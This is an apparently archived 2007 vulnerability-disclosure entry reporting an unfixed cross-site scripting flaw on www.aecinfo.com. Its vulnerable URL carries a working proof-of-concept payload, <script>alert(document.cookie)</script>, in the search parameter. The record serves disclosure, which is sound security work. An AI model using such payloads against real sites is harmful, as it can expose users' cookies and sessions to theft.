Unfixed XSS vulnerability at www.aecinfo.com

2007-03-14T00:00:00
ID XSSED:3419
Type xssed
Reporter St@rExT
Modified 2007-03-14T00:00:00

Description

Security researcher St@rExT, has submitted on 14/03/2007 a cross-site-scripting (XSS) vulnerability affecting www.aecinfo.com, which at the time of submission ranked 65391 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 14/03/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.aecinfo.com/dyn/pdc/search/search.jsp?site=1&domains=www.aecinfo.com&manual_submit=true&sitesearch=www.aecinfo.com&client=pub-5231737647953648&forid=1&channel=4115479440&ie=ISO-8859-1&oe=ISO-8859-1&safe=active&flav=0000&sig=xZHbbQkXyrJptAi8&cof=GALT%3A%23000000%3BGL%3A1%3BDIV%3A%23082862%3BVLC%3A000000%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3AFFFFFF%3BALC%3A000000%3BLC%3A000000%3BT%3A000000%3BGFNT%3A000000%3BGIMP%3A000000%3BFORID%3A11&hl=en&type=all&q=<script>alert(document.cookie)</script>